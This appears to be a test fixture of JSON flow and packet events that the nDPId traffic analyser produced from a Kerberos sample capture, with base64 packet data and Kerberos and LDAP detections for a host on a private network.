-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":13,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337929983,"flow_last_seen":1549337929983,"flow_idle_time":7440000,"flow_min_l4_payload_len":266,"flow_max_l4_payload_len":266,"flow_tot_l4_payload_len":266,"flow_avg_l4_payload_len":266,"midstream":1,"thread_ts_msec":1549337929983,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49161,"dst_port":389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00818{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1549337929983,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":320,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":320,"pkt_l4_len":286,"thread_ts_msec":1549337929983,"pkt":"pB9ywglqAAgCHEeuCABFAAEyADpAAIAGkJqsEAjJrBAICMAJAYUOQjJnSJfL+1AYAQBrWQAA8TZc0LDMp13P2bhHUwE3wC3znhyPA6u84KleikgMfgmc3jalHTIxDwXMnjy\/W4F7\/2WZoUcx2XOew9rGWayLePl5BZIz7shN5PFXYJc\/9PAyv29TC7M2XLiMKexhyeYlRE9uvUtK9DAnR\/ttWEC9zdC56cQON1H8q936tfR+Slz7RKm2uwASDHI8fSFcEQQxtgqaAo4BBsj3qlqLB0lXoxQ8eGOcEVy2\/38vMlSj+c\/3tdAxc+T2J+ChqVKK6Ti6p9NJhgfdb6n6Fkr1nJ\/E0PHo7Ab3tBkqkSpNzV9oaIDc\/AnEKYXHdAsdm\/IAEKeNDZ3xj3dnB41oCyCZcvi9r2HqvrS9bMHFZEs="} 
-00736{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1549337929983,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":264,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":264,"pkt_l4_len":230,"thread_ts_msec":1549337929983,"pkt":"AAgCHEeupB9ywglqCABFAAD6EzZAAIAGfdasEAgIrBAIyQGFwAlIl8v7DkIzcVAYAQBePQAAMIQAAADMAgEDYYQAAADDCgEABAAEAIeCALihgbUwgbKgAwoBAKELBgkqhkiC9xIBAgKigZ0EgZpggZcGCSqGSIb3EgECAgIAb4GHMIGEoAMCAQWhAwIBD6J4MHagAwIBEqJvBG1fPlG7bKWdrh2HD6cpz+MijBmfhDcDSHRgxosMnwcbCi1ZRnrViGBtMC2nQv6mVUDSJapX\/mZgtc4l9ALb+\/jokxskSCIt0GZfBXlBh6SOp7g9nc\/2WT4mG5e+fctttNW4KixsBWTLsk4U0TsD"} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":15,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337930192,"flow_last_seen":1549337930192,"flow_idle_time":7440000,"flow_min_l4_payload_len":239,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":239,"midstream":1,"thread_ts_msec":1549337930192,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49166,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00775{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1549337930192,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":293,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":293,"pkt_l4_len":259,"thread_ts_msec":1549337930192,"pkt":"pB9ywglqAAgCHEeuCABFAAEXAE9AAIAGkKCsEAjJrBAICMAOAFh1zEKiBQpS4FAYAQB22wAAAAAA62qB6DCB5aEDAgEFogMCAQqjFTATMBGhBAICAICiCQQHMAWgAwEB\/6SBwTCBvqAHAwUAQIEAEKEYMBagAwIBAaEPMA0bC2pvaG5zb24tcGMkohAbDkhBUFBZQ1JBRlQuT1JHoyMwIaADAgECoRowGBsGa3JidGd0Gw5IQVBQWUNSQUZULk9SR6URGA8yMDM3MDkxMzAyNDgwNVqmERgPMjAzNzA5MTMwMjQ4MDVapwYCBE6HHTSoFTATAgESAgERAgEXAgEYAgL\/eQIBA6kdMBswGaADAgEUoRIEEEpPSE5TT04tUEMgICAgICA="} -00722{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337930192,"flow_last_seen":1549337930192,"flow_idle_time":7440000,"flow_min_l4_payload_len":239,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":239,"midstream":1,"thread_ts_msec":1549337930192,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49166,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"johnson-pc","domain":"happycraft.org","username":""}} 
-00825{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1549337930193,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":332,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":332,"pkt_l4_len":298,"thread_ts_msec":1549337930193,"pkt":"AAgCHEeupB9ywglqCABFAAE+E0ZAAIAGfYKsEAgIrBAIyQBYwA4FClLgdcxDkVAYAQCvKAAAAAABEn6CAQ4wggEKoAMCAQWhAwIBHqQRGA8yMDE5MDIwNTAzMzg0OFqlBQIDDGWApgMCARmpEBsOSEFQUFlDUkFGVC5PUkeqIzAhoAMCAQKhGjAYGwZrcmJ0Z3QbDkhBUFBZQ1JBRlQuT1JHrIGnBIGkMIGhMH6hAwIBE6J3BHUwczA0oAMCARKhLRsrSEFQUFlDUkFGVC5PUkdob3N0am9obnNvbi1wYy5oYXBweWNyYWZ0Lm9yZzAFoAMCARcwNKADAgEDoS0bK0hBUFBZQ1JBRlQuT1JHaG9zdGpvaG5zb24tcGMuaGFwcHljcmFmdC5vcmcwCaEDAgECogIEADAJoQMCARCiAgQAMAmhAwIBD6ICBAA="} -00730{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":16,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337930192,"flow_last_seen":1549337930193,"flow_idle_time":7440000,"flow_min_l4_payload_len":239,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":258,"midstream":1,"thread_ts_msec":1549337930193,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49166,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"johnson-pc","domain":"happycraft.org","username":""}} 
-00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":17,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337930214,"flow_last_seen":1549337930214,"flow_idle_time":7440000,"flow_min_l4_payload_len":319,"flow_max_l4_payload_len":319,"flow_tot_l4_payload_len":319,"flow_avg_l4_payload_len":319,"midstream":1,"thread_ts_msec":1549337930214,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49167,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00882{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1549337930214,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":373,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":373,"pkt_l4_len":339,"thread_ts_msec":1549337930214,"pkt":"pB9ywglqAAgCHEeuCABFAAFnAFNAAIAGkEysEAjJrBAICMAPAFhOqMfQDl0Bb1AYAQBFdgAAAAABO2qCATcwggEzoQMCAQWiAwIBCqNjMGEwTKEDAgECokUEQzBBoAMCARKiOgQ4T+8E3pUi7h1ZsZOoIXjjwvAQAgQGpJXHn0jgIAIbXQei+GxBZQViNO7UVdhzj5KUys1PXrvG2C8wEaEEAgIAgKIJBAcwBaADAQH\/pIHBMIG+oAcDBQBAgQAQoRgwFqADAgEBoQ8wDRsLam9obnNvbi1wYySiEBsOSEFQUFlDUkFGVC5PUkejIzAhoAMCAQKhGjAYGwZrcmJ0Z3QbDkhBUFBZQ1JBRlQuT1JHpREYDzIwMzcwOTEzMDI0ODA1WqYRGA8yMDM3MDkxMzAyNDgwNVqnBgIETocdNKgVMBMCARICARECARcCARgCAv95AgEDqR0wGzAZoAMCARShEgQQSk9ITlNPTi1QQyAgICAgIA=="} 
-00722{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":17,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337930214,"flow_last_seen":1549337930214,"flow_idle_time":7440000,"flow_min_l4_payload_len":319,"flow_max_l4_payload_len":319,"flow_tot_l4_payload_len":319,"flow_avg_l4_payload_len":319,"midstream":1,"thread_ts_msec":1549337930214,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49167,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"johnson-pc","domain":"happycraft.org","username":""}} -00605{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1549337930214,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":166,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":166,"pkt_l4_len":132,"thread_ts_msec":1549337930214,"pkt":"AAgCHEeupB9ywglqCABFAACYE0tAAIAGfiOsEAgIrBAIyQBYwA8OXQcjTqjJD1AYAQBZNwAAQBgDyB6VZPxID+fu9kcivDlP7463Dy1IfrYrHVzuJLB3P27gpkccW43Mtu3NrktwKAyme0Z0QNo0JvH3ppwCLvPborHS7i5Jp9I5pxLf5LZX6AlmVea2udQa4ufUWkijqzhrShLiqrevOUKPGzj2OQ=="} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":19,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337930217,"flow_last_seen":1549337930217,"flow_idle_time":7440000,"flow_min_l4_payload_len":153,"flow_max_l4_payload_len":153,"flow_tot_l4_payload_len":153,"flow_avg_l4_payload_len":153,"midstream":1,"thread_ts_msec":1549337930217,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49168,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1549337930217,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1549337930217,"pkt":"pB9ywglqAAgCHEeuCABFAADBAFlAAIAGkOysEAjJrBAICMAQAFhuA\/SQrSTVxVAYAQACWAAAqoGWMIGToAMCARKigYsEgYhFQhzXcnmj64Ly0uBtjkMUoTuM+x\/rpAOTUWDkUHAspBDcB8geScaOnqOyTgnIEt9ORSbyaLGh7aDpqWoX8LkoU9AsGNn4U6LRjikWi59PfjQn46P9BY0tn6JOEZn\/IKW+bzyhJYK72MU5dfE\/Y9v1QP4pOcMGsyTXEkOUPDq6y5KpwHUNPs1e"} -00627{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1549337930217,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":180,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":180,"pkt_l4_len":146,"thread_ts_msec":1549337930217,"pkt":"AAgCHEeupB9ywglqCABFAACmE1FAAIAGfg+sEAgIrBAIyQBYwBCtJNt5bgP1KVAYAQC1BwAApQG9zo7oa2HyeKU61c2m29Ax+Ioczo4ZbPhC81jR0pDanr7lBKhJeMuGW\/uva7FyAslnHaJSlZ\/JCHVy9T8T0Ut1tj8cqy\/o\/YC+6XwQJV1\/l63dulAmK8KMVnuSbTDSVBQ5iahKxwLlZ8cbK3LMBirQeX8FcESDlzlIPsVQ"} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":21,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337930219,"flow_last_seen":1549337930219,"flow_idle_time":7440000,"flow_min_l4_payload_len":375,"flow_max_l4_payload_len":375,"flow_tot_l4_payload_len":375,"flow_avg_l4_payload_len":375,"midstream":1,"thread_ts_msec":1549337930219,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49165,"dst_port":49155,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00960{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1549337930219,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":429,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":429,"pkt_l4_len":395,"thread_ts_msec":1549337930219,"pkt":"pB9ywglqAAgCHEeuCABFAAGfAF1AAIAGkAqsEAjJrBAICMANwANTRo4+sysn9FAYAQASVgAAOJsrJlDNtr7H4lcner+4Ya97utGtvfHqO\/A9pIIBWDCCAVSgAwIBEqKCAUsEggFHE7YBEd08uXxTAz9oATIBnzsu+CIXQ7IKgHphso5XWVrf1UwI0kS3bNe0YDIltyDk2xHWA\/s5Rnf1JAD5LdMYfWfRtly9XMnusGEqHhr+HUrsB70ut1E9AZfE9oDmCRiRKgSi\/yPqeUdMQ3mTdU1fxpZbOqOrcP2UxT7TverwRJibh+asJMQhC1cH82k0XRAktx95xJlXR3QKNE1DR8fsq9gq2Y16fmA9gsztPUDC4IkAL71ItK34puHol45q2g1+vM2umAkKTXGS4uZkIzxH5rv1eNIbWz6GtEw1jeT5kTsqyd\/cgQicx4yHy9VJKmfjweCCyOHHgJ0JONAYKLNrmUspunn\/qiNj30BsQPTsl8DziFoWtJvBGiR7UAPGmzNl3CewZOrjtG26JZPGTaTuBek+GwxKg7cb\/ze4riey9Wnfq0rUqdvf"} -00836{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1549337930219,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":338,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":338,"pkt_l4_len":304,"thread_ts_msec":1549337930219,"pkt":"AAgCHEeupB9ywglqCABFAAFEE1VAAIAGfW2sEAgIrBAIycADwA2zKyf0U0aPtVAYAQCiqgAABQAMBxAAAAAcAagAAgAAANAW0BaHIgAABgA0OTE1NQADAAAAAgACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADMFcXG6vjdJgxm12++czDYBAAAAAwADAAAAAAAAAAAAAAAAAAAAAAAAAAAACQYAAAAAAAChgaUwgaKgAwoBAaELBgkqhkiC9xIBAgKigY0EgYpvgYcwgYSgAwIBBaEDAgEPongwdqADAgESom8EbZHvDki757uIRa6348vky4CmSXJcuY8x7Y1L3GMPoboaFC4AmaVBuECBYLv9qMZx8MRhhEX3NAubRHjTv4BhutqH0onvuRNc5YNBgbuLmx\/PeM5pC\/bambRC96DP0B9XtGxHF5b6I04IhLGs2Ss="} 
-00759{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1549337930219,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":274,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":274,"pkt_l4_len":240,"thread_ts_msec":1549337930219,"pkt":"pB9ywglqAAgCHEeuCABFAAEEAF5AAIAGkKSsEAjJrBAICMANwANTRo+1syspEFAYAP\/w8AAABQAOAxAAAADcAIwAAgAAANAW0BYAAAAAAQAAAAEAAQA1QlHjBkvREasEAMBPwtzSBAAAADMFcXG6vjdJgxm12++czDYBAAAACQYAAAAAAAChgYkwgYagAwoBAaJfBF1vWzBZoAMCAQWhAwIBD6JNMEugAwIBEqJEBEJ\/MyGgG2X9jllu+ZB+MxLzLgKVhkidSZOf9UFj0HoVGhQSTvPAIV6ETXdthgzo7fJnzn1QgLAxGW+unJjrxZzV2yGjHgQcBAQE\/\/\/\/\/\/8AAAAAToOoIEtcH3O\/XLUOvcMURw=="} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":24,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337931189,"flow_last_seen":1549337931189,"flow_idle_time":7440000,"flow_min_l4_payload_len":242,"flow_max_l4_payload_len":242,"flow_tot_l4_payload_len":242,"flow_avg_l4_payload_len":242,"midstream":1,"thread_ts_msec":1549337931189,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49169,"dst_port":389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00783{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1549337931189,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":296,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":296,"pkt_l4_len":262,"thread_ts_msec":1549337931189,"pkt":"pB9ywglqAAgCHEeuCABFAAEaAHBAAIAGkHysEAjJrBAICMARAYXGiPwnAgHw6FAYAQD72QAAHIAjHF8ymtjcD1VQuy4UgRChAu\/ekRMgcpsydbeCEgGc8O49XcEm2dIOQUYWz5jyNJ04mLjuLVb5JED7bXFEp0Ouk95kXWAsbhG+yaFiTruRiQNLefpIfBd02fAN9rH6kVBTVFVzTavxG5ZN46Q2CRurERdYtT07E7VAGTF+6yWhKn18+hUxFM5IXiI8jM4osfH687+lmO1gN\/3mr3cymHmPLwvBfLQ9P\/qJ62iSz72gALgVKjnTrFQYtji5UhDqTerpDdd7cbCpV4VyQehZ\/3jzwsKcVZtQElZtM7aiTvqbzIsK7RmP3EZFJoQ\/JIQyyhY="} -00734{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1549337931190,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":264,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":264,"pkt_l4_len":230,"thread_ts_msec":1549337931190,"pkt":"AAgCHEeupB9ywglqCABFAAD6E2FAAIAGfausEAgIrBAIyQGFwBECAfDoxoj9GVAYAQDO8AAAMIQAAADMAgEDYYQAAADDCgEABAAEAIeCALihgbUwgbKgAwoBAKELBgkqhkiC9xIBAgKigZ0EgZpggZcGCSqGSIb3EgECAgIAb4GHMIGEoAMCAQWhAwIBD6J4MHagAwIBEqJvBG1TTwhyAF9FVLbWTl8wTaD0aGMw9PDC0vNUorciel2CrkeZRTWRInWV74srNnVapF3vxPYDt7dvyfJVk888MzdKOasNrV1ijuwTfVJ0DIXj985iqAQmj9Mcte2ZOXgI6pFvWB0EEgpCluxB9enG"} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":26,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337931198,"flow_last_seen":1549337931198,"flow_idle_time":7440000,"flow_min_l4_payload_len":113,"flow_max_l4_payload_len":113,"flow_tot_l4_payload_len":113,"flow_avg_l4_payload_len":113,"midstream":1,"thread_ts_msec":1549337931198,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49170,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00606{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1549337931198,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":167,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":167,"pkt_l4_len":133,"thread_ts_msec":1549337931198,"pkt":"pB9ywglqAAgCHEeuCABFAACZAHRAAIAGkPmsEAjJrBAICMASAFgkNdEgXsLgdFAYAQB+8gAAMUMT6Lk9nd3l4g7meOnydVZeUkzRDUCNbnZ+O2nc5UtCJOGQV8MBRj2azOMjgxpQ1tcViooap1+TILjpjhURvLMTREvy8WPkAKcvtuPHKbLtQ3Ir7HNN6Ftdy+KwiOrOLvSrSyEtUhWZxA6KOnwca9s="} -00545{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1549337931199,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":122,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":122,"pkt_l4_len":88,"thread_ts_msec":1549337931199,"pkt":"AAgCHEeupB9ywglqCABFAABsE2VAAIAGfjWsEAgIrBAIyQBYwBJewuYoJDXRkVAYAQBPlQAA7mWAsz4LwR11oOSQ27Ex06YGG2bAP8ttVVXtAwxS755lCHRg4mUkpOjXnBJJ8KdHDkkp7LWBSVTLf+j0wkJ4hFVjx0c="} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":28,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337931210,"flow_last_seen":1549337931210,"flow_idle_time":7440000,"flow_min_l4_payload_len":1432,"flow_max_l4_payload_len":1432,"flow_tot_l4_payload_len":1432,"flow_avg_l4_payload_len":1432,"midstream":1,"thread_ts_msec":1549337931210,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49171,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -02397{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1549337931210,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1486,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1486,"pkt_l4_len":1452,"thread_ts_msec":1549337931210,"pkt":"pB9ywglqAAgCHEeuCABFAAXAAHpAAIAGi8ysEAjJrBAICMATAFio5J72SB155lAYAQAvgAAAAAAFlGyCBZAwggWMoQMCAQWiAwIBDKOCBQcwggUDMIIE\/6EDAgEBooIE9gSCBPJuggTuMIIE6qADAgEFoQMCAQ6iBwMFAAAAAACjggQ0YYIEMDCCBCygAwIBBaEQGw5IQVBQWUNSQUZULk9SR6IjMCGgAwIBAqEaMBgbBmtyYnRndBsOSEFQUFlDUkFGVC5PUkejggPsMIID6KADAgESoQMCAQKiggPaBIID1hKWdXqL0IxSnZlxRjhHmIFUVS3rvb7i9fEBKrEJ5PVjDXxsAQeDmTL9wweNNg1pCQDRmZ6AE\/m2Y7TGJV\/FdJF\/GLAs\/UE5nC+H+eLE4iuLtnFkH3govXIWXOdlEsqQhROyd4qj2WtH7bxyzZwdtdBzD8HNk\/Zyhfmgmp+oA1+8nXeYYFDFKmqTt9a00HvvmTpJfi0pguIgxY8KmJbF4d1RUkWNuXZ5g7FA43R8i0OyHjh+mwSGoE1gJ\/X8DroluAfskaOHhGVguFx+famY4o8UsY6g4BojHiLERbIlzMsUYRq\/EQf2FuSw8Wc3swODADnnHqoAdpFJG5\/GMQbUUUhsHy5eDXa3\/EPT1ZKqI0bJsr7jOF5G9ytS8thT6E7bOOCcOFN4JNFsCA3bCyRL6jYH2ZedtZMr5yCI40ePAHAaIBbEPTKYDMpCUKxXExG41vrN6dY4CEFLw2Tb4BDinhxjESAIpIw6LOtdRzBrkjiFKjPEj4UBorlhX90DmWgF5dFJbZXz5eOVcZ\/qmOnm8JcuVim8byzO3C2W5go47U+8GNRvk\/iuaoCs18MAuzn4DOtJmgk1eSuxxL9sUZmjkqejNSB6Ny8aYGysoT\/tUR2mS\/10DyxEUb\/M23KvW\/d0nkBg7qCjWXvlLjMDmACl3rd8MXcyqYWqmZcwKWLk5yL3YiZbL90SxemnQHTIY+DW
avybHj9SrM5+aINDzqHcDq0aHAhhwNPUOQQH+m0ab759iCYVNaTyITpTWuG6hneFvKoU9d3uSafxpBU5TJfC9PTmhW+\/db+6ouEM0JlNTrwSmfDpaJJPc+gkzn45Pl5k\/7+Abb+s6rWMNfHT+Em3MBbZJYdM0UlQ1xrel8YuJnwOOGyF4x2puehNGP\/\/\/ouwl65KT\/CBdxNVmhdbElBMgwiINySCK0GaA0G8iJuo2p3q21Z3q6PwC\/TBFuSNBvRRaLYdHeXUMMCTZUjjLBHDUqLGGPYiG40kPfZcBzP2U1v\/9gWBK4kWlSfWhwHwDob09dR24nAmYkaTEvrRnFvLOPKhepgPz5FiL+TNVO0x7Q9MEcpXED6nxJ9fgUpL+5AL+5zKjvBqGhTBSFztV5n2jwS9BN5nwKGyQXNwz7M3IugClC01JUeDu8ccEtCesL+sdsbL1EP7jcFCC1EniPRKxntY82esVy8lyQlrXBxmBdMcKVUa21imq65LZV0MJEQvFPcKWd3cpqWETjO2y3rGD5HXk8dwPDck3LvUU56PaEiLP3SNlqGRnDfEXoiRxz6YMXMhdwJMRbqAQJYa71fsqMLgQ4u3s5WkgZwwgZmgAwIBEqKBkQSBjkBvFbBksZRBZsgqvT9rWZWIMz104YLf86+Cksa0ZMsEGJ\/RDcCZOr8kPQRKlwzkm2uQjqkaOemu4sYhWXYr71KrOEs2JUveeWW4HHkLaYXd0a2yOtTAVV1zR76rPVw3Om2DZiy3OdOJiQuRn3tY6sCbzkX\/gKz0r0nI8miItgy4uzP0Z9rEEUiiCUR\/XkOkdTBzoAcDBQBAgQAAohAbDkhBUFBZQ1JBRlQuT1JHoycwJaADAgEKoR4wHBsaam9obnNvbi1wYyRASEFQUFlDUkFGVC5PUkelERgPMjAzNzA5MTMwMjQ4MDVapwYCBE44sbqoEjAQAgESAgERAgEXAgEYAgL\/eQ=="} -00717{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":28,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337931210,"flow_last_seen":1549337931210,"flow_idle_time":7440000,"flow_min_l4_payload_len":1432,"flow_max_l4_payload_len":1432,"flow_tot_l4_payload_len":1432,"flow_avg_l4_payload_len":1432,"midstream":1,"thread_ts_msec":1549337931210,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49171,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"happycraft.org","username":""}} 
